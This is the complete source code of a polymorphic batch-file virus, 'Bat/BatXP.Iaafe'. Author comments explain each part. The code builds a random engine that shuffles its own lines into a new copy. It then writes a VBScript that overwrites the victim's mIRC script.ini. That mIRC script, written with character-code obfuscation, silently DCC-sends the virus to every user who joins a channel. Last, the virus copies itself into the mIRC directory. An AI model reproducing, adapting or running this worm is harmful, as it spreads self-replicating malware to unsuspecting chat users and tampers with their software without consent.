Virus.Bat.iaafe - Source Code

set generation=0
@echo off % spth-phile %
cls % spth-phile %
% spth-phile %set /a generation=%generation%+1
% spth-phile %if %generation% EQU 5 (
% spth-phile %echo You are infect with philet0ast3r's and Second Part To Hell's Bat/BatXP.Iaafe!
% spth-phile %set generation=0
% spth-phile %)
% spth-phile %echo set generation=%generation% >poly.bat
:: Bat/BatXP.Iaafe                                                                  % spth-phile %
:: by philet0ast3r[rRlf] & Second Part To Hell[rRlf]                                                    % spth-phile %
::                                                                          % spth-phile %
:: philet0ast3r: Virus idea, name idea and the genial random engine :D                                          % spth-phile %
:: Second Part To Hell: Included the virus part, encrypt the BAT/VBS part, BatXP workable (workable? +fg+), made this stuff polymporph and the comments % spth-phile %
::                                                                          % spth-phile %
:: Big thanks goes to Lord Yup for writting the the "Silend DCC SEND"-Article { You'll find it in 29A #6 }                      % spth-phile %
:: ------------------------------------------------------------------------------------------------------------------------------------------       % spth-phile %
:: General Virus Info:                                                                  % spth-phile %
::                                                                          % spth-phile %
:: Name of the Virus................................. Bat/BatXP.Iaafe                                           % spth-phile %
:: Author............................................ philet0ast3r & Second Part To Hell                                % spth-phile %
:: Size.............................................. 20.194 byte                                           % spth-phile %
:: Encrypt........................................... Most of the virus part and something of the random-engine                     % spth-phile %
:: Polymorphism...................................... Yes                                               % spth-phile %
::  (possible variants under WinXP (21*20*19*18*17*16*15*14*13*12*11*10*9*8*7*6*5*4*3*2) = 51090942171709440000 = ca. 51 trillion :]  )             % spth-phile %
::  (possible variants under WinME/98/95 (5*4*3*2) =120 ... because command.com doesn't allow more sets)                        % spth-phile %
:: Spreading......................................... The virus spreads via mIRC, but not the normal "one-line-mIRC-spreading" way, but         % spth-phile %
::                            a much better one. The User won't know, that he's infect.                     % spth-phile %
:: Payload........................................... Every 5th generation the virus shows a shourt text                        % spth-phile %
::                                                                          % spth-phile %
:: Last words by Second Part To Hell:                                                           % spth-phile %
:: I nearly commited suicide while writing this virus ;),                                               % spth-phile %
:: because i had to fix more than 1.000.000 bugs in this fuckin' program.                                       % spth-phile %
:: But I'm sure, i fixed all and now the virus works without mistake.                                           % spth-phile %
::                                                                          % spth-phile %
:: Last words by philet0ast3r:                                                              % spth-phile %
:: I just want to thank/greet some important persons:                                                   % spth-phile %
:: breathe for helping me getting the idea how a batch random # generator could work                                    % spth-phile %
:: 3ri5, kathi, ina, janine & phily for being real friends (and more ;)                                         % spth-phile %
:: Slage Hammer                                                                     % spth-phile %
:: alcopaul                                                                     % spth-phile %
:: the rest of the rRlf and some other ppl, who know me                                                 % spth-phile %
::                                                                          % spth-phile %
% spth-phile %set generation=
% spth-phile %set qwxykjsi=set
% spth-phile %set aaa=A
%qwxykjsi% fi=if % spth-phile %
%qwxykjsi% nt=not % spth-phile %
%qwxykjsi% el=errorlevel % spth-phile %
%qwxykjsi% ine=%fi% %nt% %el% % spth-phile %
% spth-phile %set vrsa=rndom
set oto=goto% spth-phile %
%qwxykjsi% a=0 % spth-phile %
set fd=find% spth-phile %
::       This part makes the set's for the crypt BAT part

%fd% "spth-phile"<%0>>poly.bat
::      The virus searches for "spth-phile" in every line of itself an
::      write this lines to the poly.bat file

%qwxykjsi% xp=true% spth-phile %
% spth-phile %if %xp% EQU true goto xptruea
::      It's a BatXP command, if it's true, the virus goes to the BatXP part

goto winparta       % spth-phile %
::      Else it goes to the Bat part

:xptruea        % spth-phile %
% spth-phile %set a=0
% spth-phile %set b=0
% spth-phile %set c=0
% spth-phile %set d=0
% spth-phile %set e=0
% spth-phile %set f=0
% spth-phile %set g=0
% spth-phile %set h=0
% spth-phile %set i=0
% spth-phile %set j=0
% spth-phile %set k=0
% spth-phile %set l=0
% spth-phile %set m=0
% spth-phile %set n=0
% spth-phile %set o=0
% spth-phile %set p=0
% spth-phile %set q=0
% spth-phile %set r=0
% spth-phile %set s=0
% spth-phile %set t=0
% spth-phile %set u=0
::      This set's are for the poly engine, because the variables can't be nothing
::      in an if-part

:start0 % spth-phile %
% spth-phile %set aa=0
::      aa, the main poly-engine variable is zero

:start1 % spth-phile %
if %aa% EQU 5 goto endpoly % spth-phile %
%qwxykjsi% /a aa=%aa%+1 % spth-phile %
::      aa is aa+1

:start2 % spth-phile %
ver|time|%fd% ",1">nul % spth-phile %
::      Searching after "1" in the current time

%ine% 1 %qwxykjsi% %vrsa%%aa%=1% spth-phile %
::      If there is no errorlevel, that means, if the searching number in the time
::      is 1, the variable %vrsa%(random)%aa%(changes, but at first it's 1) is 1!

%ine% 1 %oto% start1 % spth-phile %
::      Goto start

ver|time|%fd% ",2">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=2% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
::      Ones more the same

ver|time|%fd% ",3">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=3% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",4">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=4% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",5">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=5% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",6">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=6% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",7">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=7% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",8">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=8% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",9">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=9% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",0">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=10% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
goto start2 % spth-phile %
:endpoly % spth-phile %
% spth-phile %if %a% NEQ 1 (if %rndom1% EQU 1 (
% spth-phile %find "%aaa%AAA" <%0 >>poly.bat
% spth-phile %set a=1
% spth-phile %))
::      The last 4 lines are one if-part.
::      If a <> 1 AND if %random1% (you know: %vrsa%%aa%) is 1 then seaching
::      after "BBBB" in the whole code, and write it to poly.bat. And changing
::      the "a" to 1! So this part of the code won't write ones more to the poly.bat

% spth-phile %if %b% NEQ 1 (if %rndom1% EQU 2 (
% spth-phile %find "%aaa%BBB" <%0 >>poly.bat
% spth-phile %set b=1
% spth-phile %))
::      The same

% spth-phile %if %c% NEQ 1 (if %rndom1% EQU 3 (
% spth-phile %find "%aaa%CCC" <%0 >>poly.bat
% spth-phile %set c=1
% spth-phile %))
% spth-phile %if %d% NEQ 1 (if %rndom1% EQU 4 (
% spth-phile %find "%aaa%DDD" <%0 >>poly.bat
% spth-phile %set d=1
% spth-phile %))
% spth-phile %if %e% NEQ 1 (if %rndom2% EQU 1 (
% spth-phile %find "%aaa%EEE" <%0 >>poly.bat
% spth-phile %set e=1
% spth-phile %))
% spth-phile %if %f% NEQ 1 (if %rndom2% EQU 2 (
% spth-phile %find "%aaa%FFF" <%0 >>poly.bat
% spth-phile %set f=1
% spth-phile %))
% spth-phile %if %g% NEQ 1 (if %rndom2% EQU 3 (
% spth-phile %find "%aaa%GGG" <%0 >>poly.bat
% spth-phile %set g=1
% spth-phile %))
% spth-phile %if %h% NEQ 1 (if %rndom2% EQU 4 (
% spth-phile %find "%aaa%HHH" <%0 >>poly.bat
% spth-phile %set h=1
% spth-phile %))
% spth-phile %if %i% NEQ 1 (if %rndom3% EQU 1 (
% spth-phile %find "%aaa%III" <%0 >>poly.bat
% spth-phile %set i=1
% spth-phile %))
% spth-phile %if %j% NEQ 1 (if %rndom3% EQU 2 (
% spth-phile %find "%aaa%JJJ" <%0 >>poly.bat
% spth-phile %set j=1
% spth-phile %))
% spth-phile %if %k% NEQ 1 (if %rndom3% EQU 3 (
% spth-phile %find "%aaa%KKK" <%0 >>poly.bat
% spth-phile %set k=1
% spth-phile %))
% spth-phile %if %l% NEQ 1 (if %rndom3% EQU 4 (
% spth-phile %find "%aaa%LLL" <%0 >>poly.bat
% spth-phile %set l=1
% spth-phile %))
% spth-phile %if %m% NEQ 1 (if %rndom4% EQU 1 (
% spth-phile %find "%aaa%MMM" <%0 >>poly.bat
% spth-phile %set m=1
% spth-phile %))
% spth-phile %if %n% NEQ 1 (if %rndom4% EQU 2 (
% spth-phile %find "%aaa%NNN" <%0 >>poly.bat
% spth-phile %set n=1
% spth-phile %))
% spth-phile %if %o% NEQ 1 (if %rndom4% EQU 3 (
% spth-phile %find "%aaa%OOO" <%0 >>poly.bat
% spth-phile %set o=1
% spth-phile %))
% spth-phile %if %p% NEQ 1 (if %rndom4% EQU 4 (
% spth-phile %find "%aaa%PPP" <%0 >>poly.bat
% spth-phile %set p=1
% spth-phile %))
% spth-phile %if %q% NEQ 1 (if %rndom5% EQU 1 (
% spth-phile %find "%aaa%QQQ" <%0 >>poly.bat
% spth-phile %set q=1
% spth-phile %))
% spth-phile %if %r% NEQ 1 (if %rndom5% EQU 2 (
% spth-phile %find "%aaa%RRR" <%0 >>poly.bat
% spth-phile %set r=1
% spth-phile %))
% spth-phile %if %s% NEQ 1 (if %rndom5% EQU 3 (
% spth-phile %find "%aaa%SSS" <%0 >>poly.bat
% spth-phile %set s=1
% spth-phile %))
% spth-phile %if %t% NEQ 1 (if %rndom5% EQU 4 (
% spth-phile %find "%aaa%TTT" <%0 >>poly.bat
% spth-phile %set t=1
% spth-phile %))
% spth-phile %if %u% NEQ 1 (if %rndom5% EQU 5 (
% spth-phile %find "%aaa%UUU" <%0 >>poly.bat
% spth-phile %set u=1
% spth-phile %))
% spth-phile %if %a% EQU 1 (if %b% EQU 1 (if %c% EQU 1 (if %d% EQU 1 (
% spth-phile %if %e% EQU 1 (if %f% EQU 1 (if %g% EQU 1 (if %h% EQU 1 (
% spth-phile %if %i% EQU 1 (if %j% EQU 1 (if %k% EQU 1 (if %l% EQU 1 (
% spth-phile %if %m% EQU 1 (if %n% EQU 1 (if %o% EQU 1 (if %p% EQU 1 (
% spth-phile %if %q% EQU 1 (if %r% EQU 1 (if %s% EQU 1 (if %t% EQU 1 (if %u% EQU 1 (
goto irca % spth-phile %
% spth-phile %)))))))))))))))))))))
::      The last 7 lines are one really gigant if-part :)
::      If every letter from "a" to "u" is 1, then the file goes to the mIRC part.

goto start0 % spth-phile %
::      Else it goes to the start0 part (and searches ones more for random-numbers)

:winparta       % spth-phile %
::      Here you can find the normal Bat. If the OS isn't WinXP/Win2000prof,
::      the virus will start it's life here.

set wina=0% spth-phile %
set winb=0% spth-phile %
set winc=0% spth-phile %
set wind=0% spth-phile %
set wine=0% spth-phile %
set oto=% spth-phile %
set qwxykjsi=% spth-phile %
set nt=% spth-phile %
set fi=% spth-phile %
set el=% spth-phile %
set ine=% spth-phile %
::      These are some variables for cryption or for the poly-engine

:startwin2  % spth-phile %
% spth-phile %if not %wina%==1 goto polyengi
% spth-phile %if not %winb%==1 goto polyengi
% spth-phile %if not %winc%==1 goto polyengi
% spth-phile %if not %wind%==1 goto polyengi
% spth-phile %if not %wine%==1 goto polyengi
::      These 5 lines are doing the same as the big 7-lines-if-part in the BatXP!

goto winirc % spth-phile %
:polyengi       % spth-phile %
ver|time|find ",1">nul % spth-phile %
if not errorlevel 1 set randoma=1% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
::      You have to know these lines, because I explained it in the BatXP part

ver|time|find ",2">nul % spth-phile %
if not errorlevel 1 set randoma=2% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
ver|time|find ",3">nul % spth-phile %
if not errorlevel 1 set randoma=3% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
ver|time|find ",4">nul % spth-phile %
if not errorlevel 1 set randoma=4% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
ver|time|find ",5">nul % spth-phile %
if not errorlevel 1 set randoma=5% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
goto startwin2   % spth-phile %
:enpolywin   % spth-phile %
% spth-phile %if not %wina%==1 if %randoma%==1 goto enapolywin
% spth-phile %if not %winb%==1 if %randoma%==2 goto enbpolywin
% spth-phile %if not %winc%==1 if %randoma%==3 goto encpolywin
% spth-phile %if not %wind%==1 if %randoma%==4 goto endpolywin
% spth-phile %if not %wine%==1 if %randoma%==5 goto enepolywin
::      If the variable "wina-e" isn't 1, then if the "randoma" is 1-5,
::      the virus goes to an other part of the Bat-poly-engine

goto startwin2   % spth-phile %
:enapolywin     % spth-phile %
% spth-phile %find "%aaa%BBB"<%0>> poly.bat
% spth-phile %find "%aaa%AAA"<%0>> poly.bat
% spth-phile %find "%aaa%KKK"<%0>> poly.bat
% spth-phile %find "%aaa%DDD"<%0>> poly.bat
set wina=1% spth-phile %
::      The virus writes every lines with "ABBB","AAAA","AKKK","ADDD" to the poly-file
::      and changes the variable "wina" to 1
% spth-phile %goto startwin2
:enbpolywin     % spth-phile %
% spth-phile %find "%aaa%EEE"<%0>> poly.bat
% spth-phile %find "%aaa%LLL"<%0>> poly.bat
% spth-phile %find "%aaa%GGG"<%0>> poly.bat
% spth-phile %find "%aaa%HHH"<%0>> poly.bat
set winb=1% spth-phile %
% spth-phile %goto startwin2
:encpolywin     % spth-phile %
% spth-phile %find "%aaa%III"<%0>> poly.bat
% spth-phile %find "%aaa%JJJ"<%0>> poly.bat
% spth-phile %find "%aaa%CCC"<%0>> poly.bat
% spth-phile %find "%aaa%FFF"<%0>> poly.bat
set winc=1% spth-phile %
% spth-phile %goto startwin2
:endpolywin     % spth-phile %
% spth-phile %find "%aaa%NNN"<%0>> poly.bat
% spth-phile %find "%aaa%MMM"<%0>> poly.bat
% spth-phile %find "%aaa%PPP"<%0>> poly.bat
% spth-phile %find "%aaa%OOO"<%0>> poly.bat
set wind=1% spth-phile %
% spth-phile %goto startwin2
:enepolywin     % spth-phile %
% spth-phile %find "%aaa%RRR"<%0>> poly.bat
% spth-phile %find "%aaa%SSS"<%0>> poly.bat
% spth-phile %find "%aaa%UUU"<%0>> poly.bat
% spth-phile %find "%aaa%TTT"<%0>> poly.bat
% spth-phile %find "%aaa%QQQ"<%0>> poly.bat
set wine=1% spth-phile %
% spth-phile %goto startwin2
:winirc      % spth-phile %
% spth-phile %set wina=
% spth-phile %set winb=
% spth-phile %set winc=
% spth-phile %set wind=
% spth-phile %set wine=
% spth-phile %set aaa=
% spth-phile %set randoma=
::      All variables used in the poly-engine are deleted

:irca % AAAA %
if exist C:\mirc\script.ini set mir=C:\mirc% AAAA %
echo %mir%
if exist C:\mirc32\script.ini set mir=C:\mirc32% AAAA %
if exist C:\proga~1\mirc\script.ini set mir=C:\progra~1\mirc% AAAA %
if exist C:\prgra~1\mirc32\script.ini set mir=C:\progra~1\mirc32% AAAA %
goto ircb% AAAA %
:ircb % ABBB %
set mirc=%mir%\script.ini% ABBB %
set vs=chr(% ABBB %
goto ircc% ABBB %
:ircc % ACCC %
set wc=echo file.writeline% ACCC %
goto ircd% ACCC %
:ircd % ADDD %
echo dim fso, file > irc.vbs% ADDD %
echo set fso = createobject("scripting.filesystemobject") >>irc.vbs% ADDD %
echo set file = fso.createtextfile ("%mir%\script.ini", true)>>irc.vbs% ADDD %
goto irce% ADDD %
:irce % AEEE %
%wc% "   on 1:st" + %vs%97) + "rt: { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "filee %mir%\name.b" + %vs%97) + "t }">>irc.vbs% AEEE %
%wc% "   on 1:join:#: { ">>irc.vbs% AEEE %
%wc% "    .if (" + %vs%36) + "nick != " + %vs%36) + "me " + %vs%38) + "" + %vs%38) + " " + %vs%37) + "old != " + %vs%36) + "nick) {">>irc.vbs% AEEE %
goto ircf% AEEE %
:ircf % AFFF %
%wc% "    ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "old " + %vs%36) + "nick">>irc.vbs% AFFF %
%wc% "    .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,100000) 1 5 ." + %vs%36) + "check_him( " + %vs%36) + "nick , " + %vs%36) + "ch" + %vs%97) + "n )">>irc.vbs% AFFF %
goto ircg% AFFF %
:ircg % AGGG %
%wc% "                                        }  ">>irc.vbs% AGGG %
%wc% "   }">>irc.vbs% AGGG %
%wc% "  " + %vs%97) + "li" + %vs%97) + "s check_him {">>irc.vbs% AGGG %
goto irch% AGGG %
:irch % AHHH %
%wc% "  ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999)  ">>irc.vbs% AHHH %
%wc% "  .while (" + %vs%36) + "portfree(" + %vs%37) + "port) == " + %vs%36) + "f" + %vs%97) + "lse) { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) }">>irc.vbs% AHHH %
goto irci% AHHH %
:irci % AIII %
%wc% "  .%fi% (" + %vs%36) + "1 !isop " + %vs%36) + "2) {    ">>irc.vbs% AIII %
%wc% "    .%nt%ice " + %vs%36) + "1 :DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " teletubies ( " + %vs%36) + "+ " + %vs%36) + "ip " + %vs%36) + "+ ) ">>irc.vbs% AIII %
goto ircj% AIII %
:ircj % AJJJ %
%wc% "    ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,99999)">>irc.vbs% AJJJ %
%wc% "    .msg " + %vs%36) + "1 DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " " + %vs%37) + "filee " + %vs%36) + "longip(" + %vs%36) + "ip)  " + %vs%37) + "port " + %vs%36) + "file(" + %vs%37) + "filee).size " + %vs%36) + "+ ">>irc.vbs% AJJJ %
%wc% "    .socklisten " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%37) + "port">>irc.vbs% AJJJ %
goto irck% AJJJ %
:irck % AKKK %
%wc% "    .timers off">>irc.vbs% AKKK %
%wc% "    .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,99999) 0 10 .cloze">>irc.vbs% AKKK %
%wc% "                    }  ">>irc.vbs% AKKK %
goto ircl% AKKK %
:ircl % ALLL %
%wc% "  }">>irc.vbs% ALLL %
%wc% "  on 1:socklisten:" + %vs%37) + "sock_n" + %vs%97) + "me: {">>irc.vbs% ALLL %
goto ircm% ALLL %
:ircm % AMMM %
%wc% "  ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "client_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,9999999)">>irc.vbs% AMMM %
%wc% "  .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me">>irc.vbs% AMMM %
goto ircn% AMMM %
:ircn % ANNN %
%wc% "  ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "l 0">>irc.vbs% ANNN %
%wc% "  .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs % ANNN %
goto irco% ANNN %
:irco % AOOO %
%wc% "  .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% AOOO %
%wc% "  " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% AOOO %
goto ircp% AOOO %
:ircp % APPP %
%wc% "  ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 0">>irc.vbs% APPP %
%wc% "  }">>irc.vbs% APPP %
%wc% "  on 1:sockre" + %vs%97) + "d:" + %vs%37) + "client_n" + %vs%97) + "me: {">>irc.vbs% APPP %
goto ircq % APPP %
:ircq % AQQQ %
%wc% "  .%fi% (" + %vs%37) + "l >= " + %vs%36) + "file(" + %vs%37) + "filee).size) {">>irc.vbs% AQQQ %
%wc% "    ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 1">>irc.vbs% AQQQ %
goto ircr% AQQQ %
:ircr % ARRR %
%wc% "    .sockclose " + %vs%37) + "client_n" + %vs%97) + "me">>irc.vbs% ARRR %
%wc% "    .h" + %vs%97) + "lt">>irc.vbs% ARRR %
%wc% "   } .else {">>irc.vbs% ARRR %
goto ircs% ARRR %
:ircs % ASSS %
%wc% "    .%fi% (" + %vs%37) + "end != 1) {">>irc.vbs% ASSS %
%wc% "    .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs% ASSS %
goto irct% ASSS %
:irct % ATTT %
%wc% "    .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% ATTT %
%wc% "    " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% ATTT %
%wc% "  } } }">>irc.vbs% ATTT %
goto ircu% ATTT %
:ircu % AUUU %
%wc% "  " + %vs%97) + "li" + %vs%97) + "s cloze { .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me } ">>irc.vbs% AUUU %
echo file.Close >>irc.vbs% AUUU %
cscript irc.vbs% AUUU %
cls% AUUU %
goto eirc% AUUU %
::      This is the whole virus part
::      It spreads via mIRC, and is mostly encrypt

:eirc % phile-spth %
del irc.vbs % phile-spth %
find "phile-spth"<%0>>poly.bat
copy poly.bat %mir%\name.bat % phile-spth %
del poly.bat % phile-spth %
cls  % phile-spth %
::      Last but not least, the virus searchs for "phile-spth" in the viruscode,
::      And write it to the poly.bat! Then it copies the poly.bat to the mIRC-dir
::      and deletes the irc-vbs and the poly.bat!